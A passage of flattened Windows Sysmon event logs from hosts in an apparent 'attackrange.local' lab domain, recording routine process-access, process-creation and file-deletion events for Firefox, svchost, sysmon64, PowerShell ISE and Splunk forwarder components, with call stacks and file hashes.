Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802F6E628C8)|UNKNOWN(FFFF82500B8B4A38)|UNKNOWN(FFFF82500B8B4BB7)|UNKNOWN(FFFF82500B8AF241)|UNKNOWN(FFFF82500B8B0C0A)|UNKNOWN(FFFF82500B8AEEC6)|UNKNOWN(FFFFF802F6B79E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000005918405Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.824{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802F6E628C8)|UNKNOWN(FFFF82500B8B4A38)|UNKNOWN(FFFF82500B8B4BB7)|UNKNOWN(FFFF82500B8AF241)|UNKNOWN(FFFF82500B8B0C0A)|UNKNOWN(FFFF82500B8AEEC6)|UNKNOWN(FFFFF802F6B79E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918404Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.824{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFbb21922.TMPMD5=AA944C75C958E0E792675AC641347DD5,SHA256=C163F0C005C71F93E628FCB678D01AB59B112D0D0B013A83DA72947B429A3380,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918403Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918402Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.748{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638679Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.881{BFB545BB-B43E-605B-305A-00000000AF01}31722088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638678Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B43E-605B-305A-00000000AF01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638677Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638676Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638675Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638674Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638673Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638672Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638671Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638670Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638669Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638668Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B43E-605B-305A-00000000AF01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638667Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.741{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B43E-605B-305A-00000000AF01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638666Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.742{BFB545BB-B43E-605B-305A-00000000AF01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638665Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.444{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ACA905894585E7BF51341CB4170406A,SHA256=2ED235962CE2BEEDB19A85AA14A68C51B3A77891C1CBBACC9C27F532ED6C15DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918411Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:54.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918410Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:54.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918409Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:54.072{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918408Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:54.072{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638664Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:54.209{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A36E76B9D0C4F2B9BF284A184CD5140,SHA256=C1ECE5F8BDFE2A9E9B388113CA71CB6D03BA16B414787A95BE9AEF1EC8842668,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638708Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B43F-605B-325A-00000000AF01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638707Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638706Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638705Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 